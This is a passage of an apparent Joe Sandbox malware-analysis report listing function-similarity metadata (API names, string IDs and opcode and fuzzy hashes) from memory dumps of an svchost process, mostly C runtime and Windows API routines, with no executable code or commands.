• Instruction ID: 94d9e67a34e61d90d8dc91a526529cd9d217a7a82295564c3aa49440afe65ca8
• Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction Fuzzy Hash: 79810230F0064187FA50AB69984D39966ECAB87F82F1C44249A8B73396DF3DC84D8783

Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
• Instruction ID: 50e13fa17c3bf59197d400e801c98b0be272adff0d23520052f25ab3404dd5bc
• Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
• Instruction Fuzzy Hash: 3F319021B12A40A3EE11DF46A80C76562DCB74AFA1F5D05259D1F6B790DF3DC849C392

Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
• Instruction ID: ff65df3e6d8c9de4419cb773b33199b337b810cada23280e1cd4933ea371c746
• Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
• Instruction Fuzzy Hash: 8A116D32B14B8087E7509B52E84D31976B8F78AFE4F084224EA5F97794CF7CC8188781

Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
• Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Instruction ID: 025d1bc40c232432275dae4ecc1318edf57f0e1ebcf64f5229914e418f725714
• Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Instruction Fuzzy Hash: F8115B76B04B8187EF149B62E40C66976B8FB8AF85F480029DE8E17794EF3DC609C705

Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
• Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
• Instruction ID: 5f5900bbcb72c6ae03449aabeaeaebc51276a3d35255987f9de81e93377eb069
• Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
• Instruction Fuzzy Hash: 3BD1B836604B8882EA70DB0AE49835A77F4F389F85F144216EACE57BA5CF3DC545CB81

Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: dialer
• API String ID: 756756679-3528709123
• Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
• Instruction ID: 0dbaea95a655bbe900e3289c597c93d81e3b199630ae2b61a37e5e2c9be7583f
• Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
• Instruction Fuzzy Hash: AA31BF32B01B5183EA10DF66A64C76A67E8FB46FC5F0C40249E4A17B55EF3CC4A98381

Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
• Instruction ID: 0c3f37101a929da6b2ab2e1659a4edb589a4527edbf683f148d599b530f189ca
• Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
• Instruction Fuzzy Hash: A4116020B0028443FA64A7315A5D72962DE6B86FF1F1C4724A937676D6DF6C84098783

Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
• API String ID: 517849248-0
• Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
• Instruction ID: 471f3759c9f5d2bef42bfea3fd4cb3963e2dd95c959e6c4d1128e52080657580
• Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
• Instruction Fuzzy Hash: C4015771B00A8083EA50DB92A85C35AA3A9F789FC5F884035DE8A63764DF7CC98DC741

Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
• Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
• Instruction ID: 79ca0cd446847db94c87b220a4133f292dc0ecc6b103301cedece9ec62c6ad04
• Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
• Instruction Fuzzy Hash: B8011BB5B15B8087EB249B62E80D71972B8BB46F86F080424CA4A27754EF7DC50CC742

Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
• Instruction ID: 077875c1ecc3ba653c40cf27df437926aa55189474758356bf14258b29207a20
• Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
• Instruction Fuzzy Hash: AC517C32B0160087EB18DF15E84CB5937DAF346F99F198528DA5B63788EF79C849C782

Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
• Instruction ID: ba38e771323935cd7c4c993903e564a77b026bca2c24c40e091b995464114721
• Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
• Instruction Fuzzy Hash: 39315432B0064087E714DF12E84CB1977A9F386F89F0A8418EA5B23789DF79C948C786

Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
• Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
• Instruction ID: b1b7e669e6661b3feae12b7b33b5b685191a7800304716cf001d880ba287570f
• Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
• Instruction Fuzzy Hash: 07F08C72B0468083FB208B60E88C35A63B9F749F88F888024DA4A57964DF6CC68DCB01

Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
• Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
• Instruction ID: cf77e8b58ec68dbf932fe7d168add0dfe5d0c02535d993d737ff7324a50749b0
• Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
• Instruction Fuzzy Hash: 65F08CA0B04BC083EA008B93B90D119B2A9AB4AFC0F0C8430EE4B27B28DF7CC44D8701
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction ID: e21ae87d0ac0485e57b5ed7f78d9bcfc49820b6887902ab70198c3f652ea4012
                                                              • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction Fuzzy Hash: 24F06275B1164583EF108B64E84D3597368EB86F61F5C4619CA6B5B1E8CF6CC14DC341
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction ID: 9fa3ce34b8c865c90ad51e3620c2008df4696012e5c82a0db968548b5f0cb8e8
                                                              • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction Fuzzy Hash: 1002E832A19B8487EB60CB55F49835AB7E4F3C5B91F140015EA8E97BA8DF7DC488CB41
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                              • Instruction ID: 94fa4eeebce64f2b49e1f32bc3357c48cfb3c794009292f3f2d6159d2374f774
                                                              • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                              • Instruction Fuzzy Hash: AE61F636A19B44C7E7608B15E44C31AB7E8F389B85F580115EA8E57BA8DF7CC548CF82
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: 66361736f5e8a90f3f2d0b71ac309b0d3cb3498acf01c0f7b7fefb88f4f0f5d8
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: F211A022F10A5123F6641568E95F369354C6B7BBBCF5C0634E977277E6CF2CC84A8202
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: 22cd65d3b8f6dd6f7d9b94902791a143805ac03df98696b6fd4da49aabfe5191
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: F2118F22F10AD113FA649539F44D36911CD7B5FB76E4C8638A966073F68F2CCACD4202
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                              • API String ID: 3215553584-4202648911
                                                              • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction ID: 0bf1e752806efdf3d6918c8cb5621e3440e718aefe77ceb97043c9c5cc2f889e
                                                              • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction Fuzzy Hash: 80618E66F0024047FB658B75E54C32B66ADEB87F40F5D4519CA4A177A8DF3CC9CE820A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: af1233a52f56241061660763b27a88547fce862d6649db4ccb4df901e0d389cc
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: 86614932B00B848AEB20DF65E44839D77E4F345B89F084215EE4A27BA8DF78C599C781
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 71553aecd4e6c0be1a45bd4f8553e36c14cf70e2545c3f161416fa0a9a176b52
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: 7F519272B002808BEB648F25A49C35977E8F356F86F1C4119DA8A67BE5CF7CD458C782
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 9e9e64640e33ee222bca170c8ee76b8c2aa3a2d202631a961c3e70975ee64d6a
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: CE515B32E042808BEBA48B26D44CB5877ADFB56F84F1C5116DA9987AE5CF7CD4D88702
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction ID: 8201e1b19b336b27b06942c19ab8646d026c506d3e7787226ca7cd4a84cb06ae
                                                              • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction Fuzzy Hash: 4751AF32F112008BEB14CB15E40CB59379DFB52F98F9AA124DA064378CEF38D9C89706
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction ID: cefbc8a046af985220aa2329bd1f73024f30a7703efedaf0860a35be415e2574
                                                              • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction Fuzzy Hash: 94317A35B1168097E7149B21E84C75937ACFB42F88F5A9018EE5A03788DF3CC988D706
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction ID: daab32c25a9fadadc3e1a32652520a2a78c62dababe1d4e9fdec7867a8e6883d
                                                              • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction Fuzzy Hash: 7AD1E332B14A808AE711CFB5D54939C3BB9F356B98F284215DE5AB7B99DF38C40AC341
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Free
                                                              • String ID:
                                                              • API String ID: 3168794593-0
                                                              • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction ID: 921e1a85b60784aa0bba0433d9b0249e05675eea00effd83e5fc34bb76f58227
                                                              • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction Fuzzy Hash: D5118BB6A00AD0C7E714DFA2A80D25977B8F78AF85F084035EA4A23726DF7CC058C741
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction ID: f98e1d8c780189fb48322b240abb3135e65948d30303f15e17900ffbada13fd6
                                                              • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction Fuzzy Hash: 85918E72B1065486FB609F75994E3AD3BA8B747F98F284109DE0B77694DF38C48AC702
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction ID: 1cc862d301829f27dd78957ba1fd8c5096fa0c01cbaac4e6f591e442f6dc95cb
                                                              • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction Fuzzy Hash: 14111F32B10F418AEB409B60E8593A833B8F719B58F480D21DA6E57794DF7CC1988381
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction ID: a77167060b87a4fc452a4d9a47af32d2e27e7869f2a7b79b94de1e5e43e7598e
                                                              • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction Fuzzy Hash: 3571A436B0078147EA25DE35994C3AA67E8F386F95F580016DD0B63B89DF39C54DC782
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CallTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3163161869-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: 4c1e01fd7d14f6ffb4a4eaa44a0f6dfd295677d667dd27de79d18e1f6fb3ebd9
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: 21614832F00B848AEB20DF65D48879D77A8FB45B88F084216EF4917B99DF38D199C701
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction ID: 8b65ca84562374e5dcff84955426101dcfa6df48021d4bc966f847153521bb2b
                                                              • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction Fuzzy Hash: 03519232B0478183E664DA39A65C3AAA6E9F386F41F4A0125DD5B33B59DF3DC50C87C2
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction ID: 435cc8df130a4e77d3710c788b2ddf4808abbc3271533ea666418ec5651f9c6f
                                                              • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction Fuzzy Hash: E941E672B14A8087DB20DF25E94D3AA77A4F38AB94F584021EE4E97784DF7CC405C741
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction ID: b3e6afc7812eff5d23d9e2531ddbd3c8dde3b3595130f4102b15f64d21df9287
                                                              • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction Fuzzy Hash: 5A115832604B8082EB218F15E448359B7E8FB89F94F1D4220EE8E17B68DF3CC555CB40
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: ierarchy Descriptor'$riptor at (
                                                              • API String ID: 592178966-758928094
                                                              • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction ID: 0f3f6b22aa811685f5e546128debed61f89d1e56892167602ce41c22e1950124
                                                              • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction Fuzzy Hash: FDE04F65B50B8591DB028F62E8482D833A89B5AB64B489122D95C07311EB3CD2EDC301
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: Locator'$riptor at (
                                                              • API String ID: 592178966-4215709766
                                                              • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
